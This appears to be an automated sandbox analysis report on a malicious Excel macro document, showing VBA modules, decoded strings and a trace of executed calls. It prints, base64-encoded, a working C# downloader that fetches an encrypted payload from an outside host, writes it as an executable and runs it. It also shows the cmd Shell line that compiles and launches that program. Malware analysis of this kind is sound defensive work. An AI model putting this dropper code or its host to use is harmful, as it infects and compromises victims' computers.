Len("447033") -> 6 Len("615735") -> 6 Len("6C6547") -> 6 Len("55674C") -> 6 Len("323931") -> 6 Len("64446F") -> 6 Len("690000") -> 6 Len("2F7461") -> 6 Len("726765") -> 6 Len("743A77") -> 6 Len("696E65") -> 6 Len("786520") -> 6 Len("2F6F75") -> 6 Len("743A22") -> 6 Len("222022") -> 6 Len("220000") -> 6 Len("55324E") -> 6 Len("796158") -> 6 Len("423061") -> 6 Len("57356E") -> 6 Len("4C6B5A") -> 6 Len("706247") -> 6 Len("565465") -> 6 Len("584E30") -> 6 Len("5A5731") -> 6 Len("50596D") -> 6 Len("706C59") -> 6 Len("33513D") -> 6 Len("536372") -> 6 |
| Strings | Decrypted Strings |
|---|---|
| "0" |
| Line | Instruction | Meta Information |
|---|---|---|
| 54 | Public Function MkDBatLxGyV(ByVal nnDweiifrwp) | |
| 55 | nnDweiifrwp = Hex(nnDweiifrwp) | Hex executed |
| 56 | nnDweiifrwp = String(6 - Len(nnDweiifrwp), "0") & nnDweiifrwp | String Len("56314E") -> 6 executed |
| 57 | MkDBatLxGyV = nnDweiifrwp | |
| 58 | End Function |
| Strings | Decrypted Strings |
|---|---|
| "dXNpbmcgU3lzdGVtOw0KdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWM7DQp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7DQp1c2luZyBTeXN0ZW0uSU87DQp1c2luZyBTeXN0ZW0uTmV0Ow0KdXNpbmcgU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeTsNCnVzaW5nIFN5c3RlbS5UZXh0Ow0KdXNpbmcgU3lzdGVtLlRocmVhZGluZzsNCnVzaW5nIFN5c3RlbS5XaW5kb3dzLkZvcm1zOw0KDQpjbGFzcyBQDQp7DQogICAgc3RhdGljIEZvcm0gZnJtOw0KICAgIHN0YXRpYyB2b2lkIE1haW4oKQ0KICAgIHsNCiAgICAgICAgQXBwbGljYXRpb24uRW5hYmxlVmlzdWFsU3R5bGVzKCk7DQogICAgICAgIFRocmVhZC5TbGVlcCgzMDAwMCk7DQogICAgICAgIGZybSA9IG5ldyBGb3JtKCk7DQogICAgICAgIGZybS5PcGFjaXR5ID0gMDsNCiAgICAgICAgZnJtLlNob3dJblRhc2tiYXIgPSBmYWxzZTsNCiAgICAgICAgZnJtLldpbmRvd1N0YXRlID0gRm9ybVdpbmRvd1N0YXRlLk1pbmltaXplZDsNCiAgICAgICAgZnJtLlNob3duICs9IGZzOw0KICAgICAgICBBcHBsaWNhdGlvbi5SdW4oZnJtKTsNCiAgICB9DQogICAgc3RhdGljIHZvaWQgT3BlcmF0dXIob2JqZWN0IG8pDQogICA" |
| Line | Instruction | Meta Information |
|---|---|---|
| 3 | Function GvEUiwUw() | |
| 4 | Dim SDPwUfecafXJOTAk as String | executed |
| 5 | Dim aMlCcfOubdDIjnC as String | |
| 7 | SDPwUfecafXJOTAk = "dXNpbmcgU3lzdGVtOw0KdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWM7DQp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7DQp1c2luZyBTeXN0ZW0uSU87DQp1c2luZyBTeXN0ZW0uTmV0Ow0KdXNpbmcgU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeTsNCnVzaW5nIFN5c3RlbS5UZXh0Ow0KdXNpbmcgU3lzdGVtLlRocmVhZGluZzsNCnVzaW5nIFN5c3RlbS5XaW5kb3dzLkZvcm1zOw0KDQpjbGFzcyBQDQp7DQogICAgc3RhdGljIEZvcm0gZnJtOw0KICAgIHN0YXRpYyB2b2lkIE1haW4oKQ0KICAgIHsNCiAgICAgICAgQXBwbGljYXRpb24uRW5hYmxlVmlzdWFsU3R5bGVzKCk7DQogICAgICAgIFRocmVhZC5TbGVlcCgzMDAwMCk7DQogICAgICAgIGZybSA9IG5ldyBGb3JtKCk7DQogICAgICAgIGZybS5PcGFjaXR5ID0gMDsNCiAgICAgICAgZnJtLlNob3dJblRhc2tiYXIgPSBmYWxzZTsNCiAgICAgICAgZnJtLldpbmRvd1N0YXRlID0gRm9ybVdpbmRvd1N0YXRlLk1pbmltaXplZDsNCiAgICAgICAgZnJtLlNob3duICs9IGZzOw0KICAgICAgICBBcHBsaWNhdGlvbi5SdW4oZnJtKTsNCiAgICB9DQogICAgc3RhdGljIHZvaWQgT3BlcmF0dXIob2JqZWN0IG8pDQogICA" | |
| 8 | SDPwUfecafXJOTAk = SDPwUfecafXJOTAk + "gew0KCQl3aGlsZSh0cnVlKQ0KICAgICAgICB0cnkNCiAgICAgICAgeyANCgkJCWJ5dGVbXSByYXdCeXRlcyA9IG51bGw7DQoJCQl3aGlsZSAocmF3Qnl0ZXMgPT0gbnVsbCB8fCByYXdCeXRlcy5MZW5ndGggPCAyMDQ4KQ0KICAgICAgICAgICAgeyAgICANCgkJCQl0cnkgeyB1c2luZyAoV2ViQ2xpZW50IHdjID0gbmV3IFdlYkNsaWVudCgpKXJhd0J5dGVzID0gd2MuRG93bmxvYWREYXRhKCJodHRwOi8vc2VjdXJlLmRyb3BpbmJveC5wdzo0NDMiKTsgfQ0KICAgICAgICAgICAgICAgIGNhdGNoIHsgfQ0KCQkJCVN5c3RlbS5UaHJlYWRpbmcuVGhyZWFkLlNsZWVwKDE1MDAwKTsNCgkJCX0NCgkJCXN0cmluZyBwYXRoID0gUGF0aC5DaGFuZ2VFeHRlbnNpb24oUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLCIuZXhlIik7DQogICAgICAgICAgICBMaXN0PGJ5dGU+IGxCeXRlcyA9IG5ldyBMaXN0PGJ5dGU+KCk7DQoJCQlieXRlW10gcERhdGEgPSBQcm9jZXNzRGF0YShyYXdCeXRlcywgRW5jb2RpbmcuVVRGOC5HZXRCeXRlcygiMjAxNWE5ZjYtMGU5MS00MTFjLWI4M2MtZGYyMzJkNjhkNjgxIikpOw0KCQkJaWYoQml0Q29udmVydGVyLlRvVUludDE2KHBEYXRhLCAwKSAhPSAweDVhNG" | |
| 9 | SDPwUfecafXJOTAk = SDPwUfecafXJOTAk + "QpDQoJCQl7DQoJCQkJcmF3Qnl0ZXMgPSBuZXcgYnl0ZVswXTsNCgkJCQl0aHJvdyBuZXcgRXhjZXB0aW9uKCk7DQoJCQl9DQogICAgICAgICAgICBsQnl0ZXMuQWRkUmFuZ2UocERhdGEpOw0KICAgICAgICAgICAgbEJ5dGVzLkFkZFJhbmdlKEd1aWQuTmV3R3VpZCgpLlRvQnl0ZUFycmF5KCkpOw0KICAgICAgICAgICAgRmlsZS5Xcml0ZUFsbEJ5dGVzKHBhdGgsIGxCeXRlcy5Ub0FycmF5KCkpOw0KICAgICAgICAgICAgUHJvY2Vzcy5TdGFydChwYXRoKTsNCgkJCWJyZWFrOw0KICAgICAgICB9DQogICAgICAgIGNhdGNoIHsgfQ0KDQogICAgICAgIHRyeSB7IGZybS5JbnZva2UobmV3IE1ldGhvZEludm9rZXIoZikpOyB9DQogICAgICAgIGNhdGNoIHsgfQ0KICAgIH0NCiAgICBzdGF0aWMgdm9pZCBmKCkgeyBmcm0uQ2xvc2UoKTsgfQ0KICAgIHN0YXRpYyB2b2lkIGZzKG9iamVjdCBzZW5kZXIsIEV2ZW50QXJncyBlKQ0KICAgIHsgVGhyZWFkUG9vbC5RdWV1ZVVzZXJXb3JrSXRlbShPcGVyYXR1cik7IH0NCiAgICBzdGF0aWMgYnl0ZVtdIFByb2Nlc3NEYXRhKGJ5dGVbXSBhcnIsIGJ5dGVbXSBwZXBwZXIpDQogICAgew0KICAgICAgICBieXRlW10gb3V0cHV0Ow0KICAgICAgI" | |
| 10 | SDPwUfecafXJOTAk = SDPwUfecafXJOTAk + "CBieXRlW10gc2FsdEJ5dGVzID0gRW5jb2RpbmcuVVRGOC5HZXRCeXRlcygiZTU2OTkyNjAtNWJmZS00Y2NhLThiZmMtMjQyODc0ODYwYzYxIik7DQogICAgICAgIHVzaW5nIChNZW1vcnlTdHJlYW0gbXMgPSBuZXcgTWVtb3J5U3RyZWFtKCkpDQogICAgICAgIHVzaW5nIChSaWpuZGFlbE1hbmFnZWQgcmlqID0gbmV3IFJpam5kYWVsTWFuYWdlZCgpKSB7IHJpai5LZXlTaXplID0gMjU2OyByaWouQmxvY2tTaXplID0gMTI4OyBSZmMyODk4RGVyaXZlQnl0ZXMga2V5ID0gbmV3IFJmYzI4OThEZXJpdmVCeXRlcyhwZXBwZXIsIHNhbHRCeXRlcywgMTAwKTsgcmlqLktleSA9IGtleS5HZXRCeXRlcyhyaWouS2V5U2l6ZSAvIDgpOyByaWouSVYgPSBrZXkuR2V0Qnl0ZXMocmlqLkJsb2NrU2l6ZSAvIDgpOyByaWouTW9kZSA9IENpcGhlck1vZGUuQ0JDOyB1c2luZyAoQ3J5cHRvU3RyZWFtIGNzID0gbmV3IENyeXB0b1N0cmVhbShtcywgcmlqLkNyZWF0ZURlY3J5cHRvcigpLCBDcnlwdG9TdHJlYW1Nb2RlLldyaXRlKSkgY3MuV3JpdGUoYXJyLCAwLCBhcnIuTGVuZ3RoKTsgb3V0cHV0ID0gbXMuVG9BcnJheSgpOyB9IHJldHVybiBvdXRwdXQ7DQogICAgfQ0KfQ==" | |
| 12 | GvEUiwUw = SDPwUfecafXJOTAk | |
| 13 | End Function |
| Line | Instruction | Meta Information |
|---|---|---|
| 50 | Public Function JOTAkLhCyW(ByVal SzQsCIGER, ByVal tMtFeVgYoKjjw) as Integer | |
| 51 | JOTAkLhCyW = ((3300 / 100) * (1 * 1)) + 5 | executed |
| 52 | End Function |
Module: Sheet1 |
|---|
Declaration |
|---|
| Line | Content |
|---|---|
| 1 | Attribute VB_Name = "Sheet1" |
| 2 | Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" |
| 3 | Attribute VB_GlobalNameSpace = False |
| 4 | Attribute VB_Creatable = False |
| 5 | Attribute VB_PredeclaredId = True |
| 6 | Attribute VB_Exposed = True |
| 7 | Attribute VB_TemplateDerived = False |
| 8 | Attribute VB_Customizable = True |
Module: Sheet2 |
|---|
Declaration |
|---|
| Line | Content |
|---|---|
| 1 | Attribute VB_Name = "Sheet2" |
| 2 | Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" |
| 3 | Attribute VB_GlobalNameSpace = False |
| 4 | Attribute VB_Creatable = False |
| 5 | Attribute VB_PredeclaredId = True |
| 6 | Attribute VB_Exposed = True |
| 7 | Attribute VB_TemplateDerived = False |
| 8 | Attribute VB_Customizable = True |
Module: Sheet3 |
|---|
Declaration |
|---|
| Line | Content |
|---|---|
| 1 | Attribute VB_Name = "Sheet3" |
| 2 | Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" |
| 3 | Attribute VB_GlobalNameSpace = False |
| 4 | Attribute VB_Creatable = False |
| 5 | Attribute VB_PredeclaredId = True |
| 6 | Attribute VB_Exposed = True |
| 7 | Attribute VB_TemplateDerived = False |
| 8 | Attribute VB_Customizable = True |
Module: ThisWorkbook |
|---|
Declaration |
|---|
| Line | Content |
|---|---|
| 1 | Attribute VB_Name = "ThisWorkbook" |
| 2 | Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" |
| 3 | Attribute VB_GlobalNameSpace = False |
| 4 | Attribute VB_Creatable = False |
| 5 | Attribute VB_PredeclaredId = True |
| 6 | Attribute VB_Exposed = True |
| 7 | Attribute VB_TemplateDerived = False |
| 8 | Attribute VB_Customizable = True |
Executed Functions |
|---|
| APIs | Meta Information |
|---|---|
Part of subcall function rpHTVPhPlNzeiOHkGWhPpSxNM@Module1: CreateObject | |
Transpose | |
Array | |
Part of subcall function bRfcoUjl@Module1: ExpandEnvironmentStrings | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbCrLf | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbTab | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: Len | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: InStr | |
Part of subcall function tpqfxxQMYW@Module3: vbBinaryCompare | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ly | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ku | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Fu | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: Left | |
Part of subcall function tpqfxxQMYW@Module3: Chr | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbCrLf | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbTab | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: Len | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: InStr | |
Part of subcall function tpqfxxQMYW@Module3: vbBinaryCompare | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ly | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ku | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Fu | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: Left | |
Part of subcall function tpqfxxQMYW@Module3: Chr | |
Part of subcall function GRjYTpXPjoJ@ThisWorkbook: Len | |
Part of subcall function GRjYTpXPjoJ@ThisWorkbook: Stack | |
Part of subcall function GRjYTpXPjoJ@ThisWorkbook: Randomize | |
Part of subcall function GRjYTpXPjoJ@ThisWorkbook: Mid | |
Part of subcall function GRjYTpXPjoJ@ThisWorkbook: Stack | |
Part of subcall function GRjYTpXPjoJ@ThisWorkbook: Int | |
Part of subcall function GRjYTpXPjoJ@ThisWorkbook: Rnd | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbCrLf | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbTab | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: Len | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: InStr | |
Part of subcall function tpqfxxQMYW@Module3: vbBinaryCompare | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ly | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ku | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Fu | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: Left | |
Part of subcall function tpqfxxQMYW@Module3: Chr | |
Part of subcall function bRfcoUjl@Module1: ExpandEnvironmentStrings | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbCrLf | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbTab | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: Len | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: InStr | |
Part of subcall function tpqfxxQMYW@Module3: vbBinaryCompare | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ly | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ku | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Fu | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: Left | |
Part of subcall function tpqfxxQMYW@Module3: Chr | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbCrLf | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbTab | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: Len | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: InStr | |
Part of subcall function tpqfxxQMYW@Module3: vbBinaryCompare | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ly | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ku | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Fu | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: Left | |
Part of subcall function tpqfxxQMYW@Module3: Chr | |
Part of subcall function GRjYTpXPjoJ@ThisWorkbook: Len | |
Part of subcall function GRjYTpXPjoJ@ThisWorkbook: Stack | |
Part of subcall function GRjYTpXPjoJ@ThisWorkbook: Randomize | |
Part of subcall function GRjYTpXPjoJ@ThisWorkbook: Mid | |
Part of subcall function GRjYTpXPjoJ@ThisWorkbook: Stack | |
Part of subcall function GRjYTpXPjoJ@ThisWorkbook: Int | |
Part of subcall function GRjYTpXPjoJ@ThisWorkbook: Rnd | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbCrLf | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbTab | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: Len | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: InStr | |
Part of subcall function tpqfxxQMYW@Module3: vbBinaryCompare | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ly | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ku | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Fu | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: Left | |
Part of subcall function tpqfxxQMYW@Module3: Chr | |
Part of subcall function bRfcoUjl@Module1: ExpandEnvironmentStrings | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbCrLf | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbTab | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: Len | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: InStr | |
Part of subcall function tpqfxxQMYW@Module3: vbBinaryCompare | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ly | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ku | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Fu | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: Left | |
Part of subcall function tpqfxxQMYW@Module3: Chr | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbCrLf | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbTab | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: Len | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: InStr | |
Part of subcall function tpqfxxQMYW@Module3: vbBinaryCompare | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ly | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ku | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Fu | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: Left | |
Part of subcall function tpqfxxQMYW@Module3: Chr | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbCrLf | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbTab | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: Len | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: InStr | |
Part of subcall function tpqfxxQMYW@Module3: vbBinaryCompare | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ly | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ku | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Fu | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: Left | |
Part of subcall function tpqfxxQMYW@Module3: Chr | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbCrLf | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbTab | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: Len | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: InStr | |
Part of subcall function tpqfxxQMYW@Module3: vbBinaryCompare | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ly | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ku | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Fu | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: Left | |
Part of subcall function tpqfxxQMYW@Module3: Chr | |
Part of subcall function AnokPRtKBZYK@ThisWorkbook: CreateTextFile | |
Part of subcall function AnokPRtKBZYK@ThisWorkbook: Write | |
Part of subcall function AnokPRtKBZYK@ThisWorkbook: Close | |
Shell | Shell("cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:winexe /out:"C:\Users\luketaylor\AppData\Roaming\Microsoft\ez2pft0p9dli.exe" "C:\Users\luketaylor\AppData\Roaming\Microsoft\aht914kagfz6.cs" & "C:\Users\luketaylor\AppData\Roaming\Microsoft\ez2pft0p9dli.exe"",0) -> 3116 |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbCrLf | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbTab | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: Len | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: InStr | |
Part of subcall function tpqfxxQMYW@Module3: vbBinaryCompare | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ly | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ku | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Fu | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: Left | |
Part of subcall function tpqfxxQMYW@Module3: Chr |
| Strings | Decrypted Strings |
|---|---|
| "C3:C15" | |
| "US, CA" | |
| "USD, EUR" | |
| "xxxx" | |
